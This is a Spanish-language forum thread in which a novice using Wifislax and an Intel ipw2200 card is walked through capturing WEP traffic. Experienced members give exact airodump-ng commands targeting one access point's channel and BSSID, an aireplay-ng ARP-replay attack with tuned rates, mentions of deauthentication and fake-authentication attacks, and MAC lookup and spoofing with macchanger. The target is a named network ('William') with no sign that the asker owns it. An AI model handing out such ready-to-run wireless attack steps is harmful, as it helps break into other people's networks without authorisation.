capturano paketes con wifislax

[uper]

Cuando estoy capturando paquetes y ya e llegado a los k keria capturar como los guardo?

[hell_reuter]

en airodump los guarda kuando lo ejecutas

ejmp:

airodump-ng -w prueba eth1

ahi te guarda el archivo con nombre prueba...en la karpeta donde tienes el airodump...o k programa utilizas y bajo que SO

[sagatho]

imagino que no pusiste - w entonces se guardan automaticamente en la carpeta de wireless, capturas, alli debe de estar

[uper]

yo para capturar paketes uso el Airosccript, como ago y donde se guardan los paketes?

[ChimoC]

Hola uper:

Los paquetes de airoscript se guardan el root/swireless/airoscript


En cuanto a como se hace ... si te refieres a los diversos ataques... utiliza el botón buscar que está mas que "redicho" por el foro.

Un saludo

ChimoC

[uper]

los atakes se hacerlo, solo kiero saber donde se guardan, gracias por contestar, con k nombre se guarda? y para k se guarde cuando llevo los paketes capturados k kiero le doi a cerrar y ya?

[ChimoC]

Hola uper:

El nombre si solo has hecho escaneo sin ataque creo que se guarda como dump.cap dump.txt.... si has hecho ataque creo que se guarda con la mac del BSSID .... y si no es así.... pruebalo tu y nos lo cuentas

Un saludo

ChimoC

EDITO: Y para guardarlos le das a cerrar..... no obstante si te das cuenta cuando estas haciendo un ataque y te vas al directorio donde guarda el airoscript verás que ya te va guardando el ataque... y no te hace falta parar airoscript para lanzar aircrack

[uNbAs]

Se guardan en la carpeta swireless ....

dentro de esa carpeta si usas airoscrip ahi tendras las capturas ... y si usas lineas de comando .. pues se guardan en la carpeta de capturas ... 

[uper]

para orientarme, cuando ocupa unos 100.000 paketes?

[βerni69]

depende mucho del tamaño de los paquetes que hayas capturado

[the_often]

para orientarme, cuando ocupa unos 100.000 paketes?

Pues depende sobre todo si el archivo de capturas es .CAP o .IVS.  El airoscript creo que lo guarda en CAP (es decir captura todo, tanto lo que 'nos vale' como lo que no), por tanto unos 100.000 paketes validos en CAP pues a lo mejor incluyen unos 400.000 no validos, o sea en total unos 500.000.

Y para darte una idea (aunque poco precisa), calculale unos 80 megas para 100.000 paquetes validos en CAP.  En cambio si lo haces por comandos y capturas solo esos 100,000 ivs validos, pues no creo que llegara a 10 megas.


Saludos

[uper]

y por comandos como se hace por k no consigo nada, tengo una ipw2200 se puede hacer por comandos? se meten en la consola no? que codigo pongo plis, entonces es mejor .ivs?? dime como el codigo para k lo aga solo plis

[the_often]

http://foro.seguridadwireless.net/index.php/topic,931.0.html


Hay que mirar un poquito hombre que está puesto en una chincheta un poquito mas arriba....

[uper]

esk hay mucho escrito xDD ,  seria poner esto:


Código:
iwconfig eth0 essid "ap_objetivo" key 11111111111
airodump-ng -c canal_ap -b bssid_ap -w arichivo.cap rtap0
aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0
()
 ?? en lo de ap objetivo si la red se llama William seria poner esto? en la 3 linea ai k cambiar algo, lo de key 111111 k es?, aver tendria k kedar algo asi:?

Código:
iwconfig eth0 essid "William" key 11111111111
airodump-ng -c 11 -b bssid_ap -w arichivo.cap rtap0
aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0
lo k e puesto en negrita ai k cambiarlo?

[the_often]

Coñe que vagos somos.....  Todo eso lo tienes alli mu bien explicao...


Código:
iwconfig eth0 essid "William" key 11111111111
airodump-ng -c 11 -b bssid_ap -w arichivo.cap rtap0
aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0
lo k e puesto en negrita ai k cambiarlo?

Quita el --ipwsys.

bssid lo sustituyes por la MAC del AP, aunque esto supongo que ya lo sabes.

Y lo mismo con lo del cliente, aunque en este caso seria tu MAC porque has te has asociado tú como cliente falso.

[uper]

iwconfig eth0 essid "William" key 11111111111
airodump-ng -c 11 -b bssid_ap -w arichivo.cap rtap0
aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h cliente -i rtap0 eth0

pero asi me lo guardaria en .cap, si le cambio lok pone de archivo.cap por archivo.ivs me lo guardaria en .ivs y bien?

kedaria asi

iwconfig eth0 essid "William" key 11111111111
airodump-ng -c 11 -b MAC SUYA -w arichivo.cap rtap0
aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h MAC MIA-i rtap0 eth0

Lo de kitar --ipwsys kito el ipwsys -3? esta linea como deberia kedar
 aireplay-ng --ipwsys -3 -x 1024 -g 1000000 -b bssid -h MAC MIA-i rtap0 eth0

NOTA: vago no, sk soy un poko tonto xD y novato

[the_often]

Ainsss, a ver:



kedaria asi

iwconfig eth0 essid "William" key 11111111111
airodump-ng  -c  11 -b  MAC_de_su_AP  --ivs  -w  arichivo  rtap0
aireplay-ng  -3  -x  1024  -g  1000000  -b  MAC_de_su_AP -h MAC MIA  -i  rtap0 eth0

[uper]

muchas gracias y perdon por ser tan cansino, una ultima cosa, donde se guarda el archivo?? y como lo paso a mi disco duro, por k me meto en la carpeta k pertence a mi disco duro pero no me deja pasarla, como lo ago?

Gracias y perdon por ser tan cansino

[the_often]

No es que seas cansino, todos hemos sido nuevos, lo que es cansino es responder a cosas que ya estan muy dichas, por eso que es bueno leer y luego preguntar, porque si te lo dan todo mascado pues no vas a aprender casi nada, en lo que se refiere al funcionamiento de los atakes y de saber qué es lo que estas haciendo.

Entiendo que lo de los comandos es lioso.

El archivo .IVS se guarda en la carpeta root, si no recuerdo mal.

Para ir de forma rapida pincha en el icono de home que hay en el escritorio.

Para pasarlo a disco duro (aunque no te haria falta porque puedes pasarle el aircrack desde el mismo Wifislax), pues depende del sistema que tengas.

Si tu disco lo tienes en Fat32 pues si podras escribir desde wifislax, si es NTFS (lo mas probable), pues solo podras leer cosas pero no podras escribir en la particion de windows.

Si es ese el caso, entonces si por un casual necesitas guardar el archivo ivs, pues te recomiendo que lo guardes en una memoria USB.

[pianista]

El archivo se guarda en la carpeta que este el terminal cuando ejecutas el terminal....
Puedes averiguarlo escribiendo pwd creo...
Para pasarlo a un disco deberas montarlo en wifislax, pero si lo tienes en ntfs no podras en wifislax, asi que hazte una particion en ext3 o con algun pendrive...
Saludos
PD:Perdon the_often que ya tenia escrito esto...

[the_often]

Nada jefe 

[the_often]

Supongo que ahora vas a preguntar que como se guarda el archivo en una memoria usb.

Pues hay que montarla y despues desmontarla.  Se puede hacer con comandos con el comando 'mount',  pero wifislax tambien lo puede hacer de forma automatica por 'ventanas'.

Pinchas en el icono 'sistema' del escritorio (creo que se llama así, te lo estoy dicendo de memoria), luego en System Media (creo que es ese el nombre), y te saldrá vacia.  Pues ahora le das a actualizar y ya veras todos los dispositivos fisicos que haya en tu pc, incluido la usb si la tienes enchufada. Luego le haces doble click y el solito te la monta, y podras ver los archivos que haya dentro, asi como copiar o pegar mas archivos (esto supongo que lo podras hacer).

Luego antes de desenchufarla, haces click con el boton derecho en la usb (se llamara algo asi como SDA1 y le das a unmount, y luego ya la puedes sacar.

Saludos

[uper]

pues efectivamente lo tengo en ntfs, asink entonces no podre pasarlo al disco duro, puedo aprovechar la ranura k tiene mi portatil para tarjetas SD para pasar los datos a la tarjeta SD??

PD: ya k estamos, como averiguo mi MAC, por k la suya me la se pero la mia no

[uNbAs]

La mac la miras con ifconfig o con los lanzadores, para cambiar la MAC, abres el lanzador q si no recuerdo mal esta en herramientas wireless --->Macchanger y al aplicar una mac q no es la tuya te dice la real y la q te has puesto ...

para lo de guardar las capturas en las tarjetas tendras q mirar primero si te las reconoce ...

[the_often]

Para ver tu MAC tambien te vale con que escribas esto en una consola:

macchanger -s eth0   (en tu caso.  Para otras tarjetas lo de eth0 puede cambiar)


Salu2

[uper]

Ainsss, a ver:



kedaria asi

iwconfig eth0 essid "William" key 11111111111
airodump-ng  -c  11 -b  MAC_de_su_AP  --ivs  -w  arichivo  rtap0
aireplay-ng  -3  -x  1024  -g  1000000  -b  MAC_de_su_AP -h MAC MIA  -i  rtap0 eth0

oye, algo pasa, cuando acabo de ponerlo el codigo me sale un error de unscreable airodump-ng o algo asi, a k se deve, esta bien el codigo?

[the_often]

Espero que no lo hayas puesto todo junto en una misma ventana, jejej.

Tienes que abrir al menos dos ventanas, una para el airodump y otra parael aireplay.

Salu2

[uper]

pos creo k si xD, kedaria asi:

esto en una
iwconfig eth0 essid "William" key 11111111111
airodump-ng  -c  11 -b  MAC_de_su_AP  --ivs  -w  arichivo  rtap0



esto en otra
aireplay-ng  -3  -x  1024  -g  1000000  -b  MAC_de_su_AP -h MAC MIA  -i  rtap0 eth0

se ejecutan a la vez, o primero uno  y  luego otro? en caso de este ultimo cual primero?

[ChimoC]

Hola uper:

Ejecuta primero airodump y despues el A3... y mira lo que sucede.....  .... tambien podrías ejecutar primero el A3 y luego airodump.... pero para no liarte... airodump 1º y 2º el aireplay

Un saludo

ChimoC

[uper]

seria poner esto en la primera iwconfig eth0 essid "William" key 11111111111 airodump-ng  -c  11 -b  MAC_de_su_AP  --ivs  -w  arichivo  rtap0

por k tengo k ponerlo todo junto no? no se puede pasar de linea no?

[the_often]

Ups, fallo mio, pensé que controlabas algo más..

Cada linea es una instruccion distinta.

No se puede poner todo junto.

Metes una linea y le das a intro.

Mejor abre una ventana para cada comando y asi no te lias.

Espero que sepas como se abren las ventanas de consola.


Saludos!!   y espero que leas muchos manuales de esta misma pagina, aprenderas mucho...

sobre todo te hace falta aprender lo basico....

[uper]

soi completemente nuevo xD, entonces primero ejecuto :


iwconfig eth0 essid "William" key 11111111111

luego

airodump-ng  -c  11 -b  MAC_de_su_AP  --ivs  -w  arichivo  rtap0

luego

aireplay-ng  -3  -x  1024  -g  1000000  -b  MAC_de_su_AP -h MAC MIA  -i  rtap0 eth0

¿¿¿¿¿¿¿¿¿¿¿???

lo de "william" lo pongo sin comillas no?

[ChimoC]

Buenas uper:

Todos hemos sido nuevos .... pero hay que leer un poco más... o ver algun video (que hay a porrillo)....

Debes abrir 3 shells:

1º.- Escribes el iwconfig y toda la retaila y le das al intro

2ª.- Airodump + retaila y le das al intro

3ª.- Aireplay + retaila y le das al intro

Un saludo

ChimoC

P.D.: Retaila es el resto de comandos

[uper]

lo de "william" lo pongo sin comillas no?


pues esto creo k es lo ultimo, esta tarde lo pruebo y os cuento como me fue, cuanto puede tardar?

[the_often]

Vuelvo a repetir:


Cada linea es una instruccion distinta.

No se puede poner todo junto.

Metes una linea y le das a intro.

Mejor abre una ventana para cada comando y asi no te lias.


Saludos!!   y espero que leas muchos manuales de esta misma pagina, aprenderas mucho...

sobre todo te hace falta aprender lo basico....

soi completemente nuevo xD, entonces primero ejecuto :


iwconfig eth0 essid "William" key 11111111111

luego

airodump-ng  -c  11 -b  MAC_de_su_AP  --ivs  -w  arichivo  rtap0

luego

aireplay-ng  -3  -x  1024  -g  1000000  -b  MAC_de_su_AP -h MAC MIA  -i  rtap0 eth0

¿¿¿¿¿¿¿¿¿¿¿???

lo de "william" lo pongo sin comillas no?

Sí eso es.

Aunque leete la chicheta del manual de la IPW2200, porque aparte del aireplay -3, seguramente necesites hacer un aireplay -0 ....(Atake 0) o un aireplay -1 .... (Atake 1), dependiendo del caso.

El atake 1 + el 3 aviso que suele tardar y que no siempre sale a la 1ª sino que hay que probarlo varias veces, por si acaso luego lo preguntas, que es algo que se ha respondido ya mucho.


Lee manuales que tienes que aprender mucho y en los manuales lo tienes todo muy explicadito.

De todas formas con esas tres lineas ya podrias empezar a ver si consigues algo.


Saludos